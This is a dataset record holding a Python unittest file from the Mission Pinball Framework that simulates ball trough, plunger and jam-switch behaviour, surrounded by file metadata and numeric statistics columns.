\t\x10\t+\t5\t6\t9\t\x13\t\x06\x0c\x01\r\x01\r\x01\x07\x01'))
| 12,774.4
| 63,793
| 0.744348
| 14,234
| 63,872
| 3.332373
| 0.067866
| 0.19303
| 0.07343
| 0.035418
| 0.770034
| 0.732359
| 0.679443
| 0.651066
| 0.625577
| 0.599119
| 0
| 0.374182
| 0.014466
| 63,872
| 4
| 63,794
| 15,968
| 0.379075
| 0.000924
| 0
| 0
| 0
| 4.5
| 0.713529
| 0.554936
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 13
|
dc3590b3b750baf7cca2f1f681fd36dd0d67e88d
| 32,466
|
py
|
Python
|
mpf/tests/test_BallDeviceJamSwitch.py
|
cloudjor/mpf
|
1cf6bf18b0d81120383b0b128b0ebbfa1c62717c
|
[
"MIT"
] | null | null | null |
mpf/tests/test_BallDeviceJamSwitch.py
|
cloudjor/mpf
|
1cf6bf18b0d81120383b0b128b0ebbfa1c62717c
|
[
"MIT"
] | null | null | null |
mpf/tests/test_BallDeviceJamSwitch.py
|
cloudjor/mpf
|
1cf6bf18b0d81120383b0b128b0ebbfa1c62717c
|
[
"MIT"
] | null | null | null |
from mpf.tests.MpfTestCase import MpfTestCase
from unittest.mock import MagicMock
class TestBallDeviceJamSwitch(MpfTestCase):
max_wait_ms = 200
def getConfigFile(self):
    """Return the machine config file for the currently running test.

    The startup-reorder test uses a dedicated config (a trough that
    begins in a jammed state); every other test shares the default.
    """
    # _testMethodName is set by unittest.TestCase for the active test.
    special_configs = {
        'test_reorder_on_startup': 'test_ball_device_jam_switch_initial.yaml',
    }
    return special_configs.get(self._testMethodName,
                               'test_ball_device_jam_switch.yaml')
def getMachinePath(self):
    """Return the path of the test machine folder used by these tests."""
    machine_path = 'tests/machine_files/ball_device/'
    return machine_path
def _captured_from_pf(self, balls, **kwargs):
    """Event handler: accumulate the number of balls captured from the
    playfield into self._captured.

    The remaining event payload in **kwargs is intentionally ignored.
    """
    del kwargs  # unused event keyword arguments
    self._captured = self._captured + balls
def put_four_balls_in_trough(self):
self._captured = 0
self.machine.events.add_handler('balldevice_captured_from_playfield', self._captured_from_pf)
self.machine.switch_controller.process_switch('s_trough_1', 1)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.advance_time_and_run(1)
self.assertEqual(4, self.machine.ball_devices.trough.balls)
self.assertEqual(4, self._captured)
self._captured = 0
self.trough_coil = self.machine.coils.trough_eject
self.plunger_coil = self.machine.coils.plunger_eject
self.trough_coil.pulse = MagicMock()
self.plunger_coil.pulse = MagicMock()
    def test_reorder_on_startup(self):
        """Startup with a jammed trough and no regular ball switches active:
        the trough coil should already have pulsed to reorder the balls."""
        # test reorder on startup with a jammed trough with no ball switches active
        self.assertEqual("pulsed_2", self.machine.coils.trough_eject.hw_driver.state)
        self.advance_time_and_run(.1)
        # after the reorder pulse, three balls settle on switches plus one on jam
        self.machine.switch_controller.process_switch('s_trough_2', 1)
        self.machine.switch_controller.process_switch('s_trough_3', 1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        self.advance_time_and_run(1)
        # all four balls should be counted (three trough switches + jam switch)
        self.assertEqual(4, self.machine.ball_devices.trough.balls)
    def test_eject_with_jam_switch(self):
        """Normal eject where the ejecting ball briefly taps the jam switch."""
        # Tests the proper operation of a trough eject with a jam switch
        self.put_four_balls_in_trough()
        self.machine.playfield.add_ball(player_controlled=True)
        self.advance_time_and_run(1)
        # default pulse
        self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        # all balls momentarily leave their switches during the eject
        self.machine.switch_controller.process_switch('s_trough_1', 0)
        self.machine.switch_controller.process_switch('s_trough_2', 0)
        self.machine.switch_controller.process_switch('s_trough_3', 0)
        self.machine.switch_controller.process_switch('s_trough_4', 0)
        self.advance_time_and_run(.1)
        # three balls settle one position down; ejecting ball tickles the jam switch
        self.machine.switch_controller.process_switch('s_trough_2', 1)
        self.machine.switch_controller.process_switch('s_trough_3', 1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(.1)
        # ball goes into plunger
        self.machine.switch_controller.process_switch('s_plunger', 1)
        self.advance_time_and_run(1)
        self.assertEqual(self.machine.ball_devices.trough.balls, 3)
        self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
        # player-controlled eject: plunger must not fire until the launch button
        assert not self.plunger_coil.pulse.called
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
        # player hits the launch button
        self.machine.switch_controller.process_switch('s_launch', 1)
        self.machine.switch_controller.process_switch('s_launch', 0)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_plunger', 0)
        self.advance_time_and_run(1)
        # ball moves from plunger lane to playfield
        self.machine.switch_controller.process_switch('s_playfield', 1)
        self.machine.switch_controller.process_switch('s_playfield', 0)
        self.advance_time_and_run(.1)
        self.plunger_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.assertEqual(self.machine.ball_devices.trough.balls, 3)
        self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
        self.assertEqual(self.machine.ball_devices.playfield.balls, 1)
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("idle", self.machine.ball_devices.plunger._state)
        self.assertEqual(4, self.machine.ball_controller.num_balls_known)
        self.assertEqual(0, self._captured)
    def test_eject_no_jam_switch_activity(self):
        """Eject that completes without the jam switch ever activating."""
        # Jam switch is configured, but it is not activated when the ball
        # ejects
        self.put_four_balls_in_trough()
        self.machine.playfield.add_ball(player_controlled=True)
        self.advance_time_and_run(1)
        # default pulse
        self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.machine.switch_controller.process_switch('s_trough_1', 0)
        self.machine.switch_controller.process_switch('s_trough_2', 0)
        self.machine.switch_controller.process_switch('s_trough_3', 0)
        self.machine.switch_controller.process_switch('s_trough_4', 0)
        self.advance_time_and_run(.1)
        # remaining balls settle; no jam switch events (deliberately commented)
        self.machine.switch_controller.process_switch('s_trough_2', 1)
        self.machine.switch_controller.process_switch('s_trough_3', 1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        # self.machine.switch_controller.process_switch('s_trough_jam', 1)
        # self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(.1)
        # ball goes into plunger
        self.machine.switch_controller.process_switch('s_plunger', 1)
        self.advance_time_and_run(1)
        self.assertEqual(self.machine.ball_devices.trough.balls, 3)
        self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
        assert not self.plunger_coil.pulse.called
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
        # player hits the launch button
        self.machine.switch_controller.process_switch('s_launch', 1)
        self.machine.switch_controller.process_switch('s_launch', 0)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_plunger', 0)
        self.advance_time_and_run(1)
        # ball moves from plunger lane to playfield
        self.machine.switch_controller.process_switch('s_playfield', 1)
        self.machine.switch_controller.process_switch('s_playfield', 0)
        self.advance_time_and_run(.1)
        self.assertEqual(1, self.plunger_coil.pulse.called)
        self.assertEqual(self.machine.ball_devices.trough.balls, 3)
        self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
        self.assertEqual(self.machine.ball_devices.playfield.balls, 1)
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("idle", self.machine.ball_devices.plunger._state)
        self.assertEqual(4, self.machine.ball_controller.num_balls_known)
        self.assertEqual(0, self._captured)
    def test_eject_with_jam_all_balls_disappear(self):
        """Eject where only the jam switch stays active and every other
        ball ends up between switches: trough must reorder, then softly
        eject only the jammed ball."""
        # Ball ejects and gets stuck on jam switch. All other balls shift a
        # half position and get stuck between switches, so it's like all the
        # balls just disappeared.
        self.put_four_balls_in_trough()
        self.machine.playfield.add_ball(player_controlled=True)
        self.advance_time_and_run(1)
        # default pulse
        self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock(return_value=100)
        self.machine.switch_controller.process_switch('s_trough_1', 0)
        self.machine.switch_controller.process_switch('s_trough_2', 0)
        self.machine.switch_controller.process_switch('s_trough_3', 0)
        self.machine.switch_controller.process_switch('s_trough_4', 0)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        self.advance_time_and_run(11)
        # reorder balls
        self.trough_coil.pulse.assert_called_once_with(2, max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock(return_value=100)
        self.advance_time_and_run(.5)
        # after the reorder pulse the balls land back on switches 2-4 + jam
        self.machine.switch_controller.process_switch('s_trough_1', 0)
        self.machine.switch_controller.process_switch('s_trough_2', 1)
        self.machine.switch_controller.process_switch('s_trough_3', 1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        self.advance_time_and_run(2)
        # soft pulse to eject only the jammed ball
        self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
        self.machine.switch_controller.process_switch('s_trough_1', 0)
        self.machine.switch_controller.process_switch('s_trough_2', 1)
        self.machine.switch_controller.process_switch('s_trough_3', 1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        # ball goes into plunger
        self.machine.switch_controller.process_switch('s_plunger', 1)
        self.advance_time_and_run(1)
        self.advance_time_and_run(100)
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
        self.assertEqual(4, self.machine.ball_controller.num_balls_known)
        self.assertEqual(0, self._captured)
    def test_eject_ball_stuck_in_jam_switch(self):
        """Ejected ball sticks on the jam switch: after the eject timeout
        the trough should retry with a soft pulse."""
        # Ball ejects, gets stuck in jam switch
        self.put_four_balls_in_trough()
        self.machine.playfield.add_ball(player_controlled=True)
        self.advance_time_and_run(1)
        # default pulse
        self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        self.machine.switch_controller.process_switch('s_trough_1', 0)
        self.machine.switch_controller.process_switch('s_trough_2', 0)
        self.machine.switch_controller.process_switch('s_trough_3', 0)
        self.machine.switch_controller.process_switch('s_trough_4', 0)
        self.advance_time_and_run(.1)
        # three balls settle; ejected ball rests on the jam switch
        self.machine.switch_controller.process_switch('s_trough_2', 1)
        self.machine.switch_controller.process_switch('s_trough_3', 1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        self.advance_time_and_run(.1)
        # wait for timeout
        self.advance_time_and_run(10)
        self.assertEqual(self.machine.ball_devices.trough.balls, 4)
        self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
        # trough should retry softly
        self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
        assert not self.plunger_coil.pulse.called
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(1)
        # ball goes into plunger
        self.machine.switch_controller.process_switch('s_plunger', 1)
        self.advance_time_and_run(1)
        self.advance_time_and_run(100)
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
        self.assertEqual(4, self.machine.ball_controller.num_balls_known)
        self.assertEqual(0, self._captured)
    def test_eject_ball_falls_back_in(self):
        """Ball repeatedly leaves and falls back onto the jam switch.

        Expected retry escalation visible in the pulse arguments:
        soft (5), soft (5), default, then hard (15).
        """
        # Ball ejects, ball leaves with proper timeout, but ball falls back in
        self.put_four_balls_in_trough()
        self.machine.playfield.add_ball(player_controlled=True)
        self.advance_time_and_run(1)
        self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        self.machine.switch_controller.process_switch('s_trough_1', 0)
        self.machine.switch_controller.process_switch('s_trough_2', 0)
        self.machine.switch_controller.process_switch('s_trough_3', 0)
        self.machine.switch_controller.process_switch('s_trough_4', 0)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_trough_2', 1)
        self.machine.switch_controller.process_switch('s_trough_3', 1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(1)
        # ball goes into plunger and comes back
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        # wait for timeout
        self.advance_time_and_run(10)
        self.assertEqual(self.machine.ball_devices.trough.balls, 4)
        self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
        assert not self.plunger_coil.pulse.called
        # trough should pulse softly
        self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        # ball leaves and comes back again
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        # wait for timeout
        self.advance_time_and_run(10)
        self.assertEqual(self.machine.ball_devices.trough.balls, 4)
        assert not self.plunger_coil.pulse.called
        self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
        # trough should pulse softly again
        self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        # ball leaves and comes back again
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        # wait for timeout
        self.advance_time_and_run(10)
        self.assertEqual(self.machine.ball_devices.trough.balls, 4)
        assert not self.plunger_coil.pulse.called
        self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
        # trough should pulse normally
        self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        # ball leaves and comes back again
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        # wait for timeout
        self.advance_time_and_run(10)
        self.assertEqual(self.machine.ball_devices.trough.balls, 4)
        assert not self.plunger_coil.pulse.called
        self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
        # trough should pulse hard
        self.trough_coil.pulse.assert_called_once_with(15, max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        # ball leaves
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(1)
        # ball goes into plunger
        self.machine.switch_controller.process_switch('s_plunger', 1)
        self.advance_time_and_run(1)
        self.advance_time_and_run(100)
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
        self.assertEqual(4, self.machine.ball_controller.num_balls_known)
        self.assertEqual(0, self._captured)
    def test_eject_ball_stuck_with_second_ball_enter(self):
        """Second eject sticks on the jam switch exactly as the playfield
        ball drains back into the trough."""
        # one ball on playfield, second ball ejects but gets stuck at jam
        # switch right as playfield ball drains
        # launch a ball into the playfield
        self.put_four_balls_in_trough()
        self.machine.playfield.add_ball(player_controlled=True)
        self.advance_time_and_run(1)
        self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        self.machine.switch_controller.process_switch('s_trough_1', 0)
        self.machine.switch_controller.process_switch('s_trough_2', 0)
        self.machine.switch_controller.process_switch('s_trough_3', 0)
        self.machine.switch_controller.process_switch('s_trough_4', 0)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_trough_2', 1)
        self.machine.switch_controller.process_switch('s_trough_3', 1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(.1)
        # ball goes into plunger
        self.machine.switch_controller.process_switch('s_plunger', 1)
        self.advance_time_and_run(1)
        self.assertEqual(self.machine.ball_devices.trough.balls, 3)
        self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
        assert not self.plunger_coil.pulse.called
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
        # player hits the launch button
        self.machine.switch_controller.process_switch('s_launch', 1)
        self.machine.switch_controller.process_switch('s_launch', 0)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_plunger', 0)
        self.advance_time_and_run(1)
        # ball moves from plunger lane to playfield
        self.machine.switch_controller.process_switch('s_playfield', 1)
        self.machine.switch_controller.process_switch('s_playfield', 0)
        self.advance_time_and_run(.1)
        self.assertEqual(1, self.plunger_coil.pulse.called)
        self.assertEqual(3, self.machine.ball_devices.trough.balls)
        self.assertEqual(0, self.machine.ball_devices.plunger.balls)
        self.assertEqual(1, self.machine.ball_devices.playfield.balls)
        self.assertEqual(1, self.machine.playfield.balls)
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("idle", self.machine.ball_devices.plunger._state)
        # Playfield requests a second ball
        self.machine.playfield.add_ball()
        self.advance_time_and_run(1)
        self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        # ball gets stuck in jam switch while ball drains from pf
        self.machine.switch_controller.process_switch('s_trough_2', 0)
        self.machine.switch_controller.process_switch('s_trough_3', 0)
        self.machine.switch_controller.process_switch('s_trough_4', 0)
        self.advance_time_and_run(.1)
        # draining playfield ball briefly hits switch 1 on its way down
        self.machine.switch_controller.process_switch('s_trough_1', 1)
        self.machine.switch_controller.process_switch('s_trough_1', 0)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_trough_2', 1)
        self.machine.switch_controller.process_switch('s_trough_3', 1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        self.advance_time_and_run(10)
        # trough retries softly
        self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(1)
        self.machine.switch_controller.process_switch('s_plunger', 1)
        self.advance_time_and_run(1)
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
        self.assertEqual(4, self.machine.ball_controller.num_balls_known)
        self.assertEqual(1, self.machine.ball_devices.plunger.balls)
        self.assertEqual(3, self.machine.ball_devices.trough.balls)
        self.assertEqual(0, self.machine.playfield.balls)
        self.assertEqual(1, self._captured)
    def test_eject_while_second_ball_enter(self):
        """Second eject leaves cleanly while the playfield ball drains at
        the same time; the jam switch stays open throughout."""
        # one ball on playfield, second ball ejects and the other drains at the
        # same time. jam switch stays open
        # launch a ball into the playfield
        self.put_four_balls_in_trough()
        self.machine.playfield.add_ball(player_controlled=True)
        self.advance_time_and_run(1)
        self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        self.machine.switch_controller.process_switch('s_trough_1', 0)
        self.machine.switch_controller.process_switch('s_trough_2', 0)
        self.machine.switch_controller.process_switch('s_trough_3', 0)
        self.machine.switch_controller.process_switch('s_trough_4', 0)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_trough_2', 1)
        self.machine.switch_controller.process_switch('s_trough_3', 1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(.1)
        # ball goes into plunger
        self.machine.switch_controller.process_switch('s_plunger', 1)
        self.advance_time_and_run(1)
        self.assertEqual(self.machine.ball_devices.trough.balls, 3)
        self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
        assert not self.plunger_coil.pulse.called
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
        # player hits the launch button
        self.machine.switch_controller.process_switch('s_launch', 1)
        self.machine.switch_controller.process_switch('s_launch', 0)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_plunger', 0)
        self.advance_time_and_run(1)
        # ball moves from plunger lane to playfield
        self.machine.switch_controller.process_switch('s_playfield', 1)
        self.machine.switch_controller.process_switch('s_playfield', 0)
        self.advance_time_and_run(.1)
        self.assertEqual(1, self.plunger_coil.pulse.called)
        self.assertEqual(3, self.machine.ball_devices.trough.balls)
        self.assertEqual(0, self.machine.ball_devices.plunger.balls)
        self.assertEqual(1, self.machine.ball_devices.playfield.balls)
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("idle", self.machine.ball_devices.plunger._state)
        # Playfield requests a second ball
        self.machine.playfield.add_ball()
        self.advance_time_and_run(1)
        self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        # ball gets stuck in jam switch while ball drains from pf
        self.machine.switch_controller.process_switch('s_trough_2', 0)
        self.machine.switch_controller.process_switch('s_trough_3', 0)
        self.machine.switch_controller.process_switch('s_trough_4', 0)
        self.advance_time_and_run(.1)
        # draining playfield ball briefly hits switch 1 on its way down
        self.machine.switch_controller.process_switch('s_trough_1', 1)
        self.machine.switch_controller.process_switch('s_trough_1', 0)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_trough_2', 1)
        self.machine.switch_controller.process_switch('s_trough_3', 1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(6)
        # ball goes into plunger
        self.machine.switch_controller.process_switch('s_plunger', 1)
        self.advance_time_and_run(1)
        self.assertEqual(self.machine.ball_devices.trough.balls, 3)
        self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
        self.assertEqual(4, self.machine.ball_controller.num_balls_known)
        self.assertEqual(1, self.machine.ball_devices.plunger.balls)
        self.assertEqual(3, self.machine.ball_devices.trough.balls)
        self.assertEqual(1, self._captured)
    def test_random_jam_switch_enable(self):
        """Disabled test: jam switch activating spuriously mid-game.

        NOTE(review): the bare ``return`` below deliberately disables this
        test; everything after it is dead code kept as a sketch and ends
        in ``raise NotImplementedError``. Consider marking it with
        ``@unittest.skip`` instead so the skip shows up in test reports.
        """
        return
        # Jam switch just enables randomly
        self.put_four_balls_in_trough()
        self.machine.playfield.add_ball(player_controlled=True)
        self.advance_time_and_run(1)
        # default pulse
        self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        self.machine.switch_controller.process_switch('s_trough_1', 0)
        self.machine.switch_controller.process_switch('s_trough_2', 0)
        self.machine.switch_controller.process_switch('s_trough_3', 0)
        self.machine.switch_controller.process_switch('s_trough_4', 0)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_trough_2', 1)
        self.machine.switch_controller.process_switch('s_trough_3', 1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(.1)
        # ball goes into plunger
        self.machine.switch_controller.process_switch('s_plunger', 1)
        self.advance_time_and_run(1)
        self.assertEqual(self.machine.ball_devices.trough.balls, 3)
        self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
        assert not self.plunger_coil.pulse.called
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
        # player hits the launch button
        self.machine.switch_controller.process_switch('s_launch', 1)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_launch', 0)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_plunger', 0)
        self.advance_time_and_run(1)
        # ball moves from plunger lane to playfield
        self.machine.switch_controller.process_switch('s_playfield', 1)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_playfield', 0)
        self.advance_time_and_run(1)
        self.plunger_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.assertEqual(3, self.machine.ball_devices.trough.balls)
        self.assertEqual(0, self.machine.ball_devices.plunger.balls)
        self.assertEqual(1, self.machine.ball_devices.playfield.balls)
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("idle", self.machine.ball_devices.plunger._state)
        # Now the jam switch enables. This should never happen in a game, but
        # we should start to think about dealing with bad switches
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        # currently this will trigger a ball drain
        raise NotImplementedError
    def test_device_starts_with_active_jam_switch(self):
        """Boot with the jam switch already active; during every eject a
        ball remains on the jam switch, so every eject is a soft pulse."""
        # MPF boots with jam switch active. During eject a ball always stays
        # on the jam switch
        self.put_four_balls_in_trough()
        self.machine.switch_controller.process_switch('s_trough_1', 0)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        self.advance_time_and_run(1)
        self.machine.playfield.add_ball(player_controlled=True)
        self.advance_time_and_run(1)
        # soft pulse
        self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        self.machine.switch_controller.process_switch('s_trough_2', 0)
        self.machine.switch_controller.process_switch('s_trough_3', 0)
        self.machine.switch_controller.process_switch('s_trough_4', 0)
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(.1)
        # balls settle one position down; a ball sits on the jam switch again
        self.machine.switch_controller.process_switch('s_trough_3', 1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        self.advance_time_and_run(.1)
        # ball goes into plunger
        self.machine.switch_controller.process_switch('s_plunger', 1)
        self.advance_time_and_run(1)
        self.assertEqual(self.machine.ball_devices.trough.balls, 3)
        self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
        assert not self.plunger_coil.pulse.called
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
        # player hits the launch button
        self.machine.switch_controller.process_switch('s_launch', 1)
        self.machine.switch_controller.process_switch('s_launch', 0)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_plunger', 0)
        self.advance_time_and_run(1)
        # ball moves from plunger lane to playfield
        self.machine.switch_controller.process_switch('s_playfield', 1)
        self.machine.switch_controller.process_switch('s_playfield', 0)
        self.advance_time_and_run(.1)
        self.plunger_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
        self.assertEqual(self.machine.ball_devices.trough.balls, 3)
        self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
        self.assertEqual(self.machine.ball_devices.playfield.balls, 1)
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("idle", self.machine.ball_devices.plunger._state)
        self.assertEqual(4, self.machine.ball_controller.num_balls_known)
        self.assertEqual(0, self._captured)
        # request second ball
        self.machine.playfield.add_ball(player_controlled=True)
        self.advance_time_and_run(1)
        # soft pulse
        self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
        self.trough_coil.pulse = MagicMock()
        self.machine.switch_controller.process_switch('s_trough_3', 0)
        self.machine.switch_controller.process_switch('s_trough_4', 0)
        self.machine.switch_controller.process_switch('s_trough_jam', 0)
        self.advance_time_and_run(.1)
        self.machine.switch_controller.process_switch('s_trough_4', 1)
        self.machine.switch_controller.process_switch('s_trough_jam', 1)
        self.advance_time_and_run(.1)
        # ball goes missing for some time
        self.advance_time_and_run(10)
        # ball goes into plunger
        self.machine.switch_controller.process_switch('s_plunger', 1)
        self.advance_time_and_run(1)
        self.assertEqual("idle", self.machine.ball_devices.trough._state)
        self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
        self.assertEqual(self.machine.ball_devices.trough.balls, 2)
        self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
        self.assertEqual(self.machine.ball_devices.playfield.balls, 1)
        self.assertEqual(4, self.machine.ball_controller.num_balls_known)
        self.assertEqual(0, self._captured)
| 47.052174
| 101
| 0.721894
| 4,466
| 32,466
| 4.926332
| 0.041424
| 0.141994
| 0.131358
| 0.208627
| 0.930412
| 0.923231
| 0.915958
| 0.913913
| 0.903868
| 0.903868
| 0
| 0.017437
| 0.180373
| 32,466
| 689
| 102
| 47.120464
| 0.809357
| 0.080546
| 0
| 0.911579
| 0
| 0
| 0.069761
| 0.005408
| 0
| 0
| 0
| 0
| 0.307368
| 1
| 0.029474
| false
| 0
| 0.004211
| 0.002105
| 0.046316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
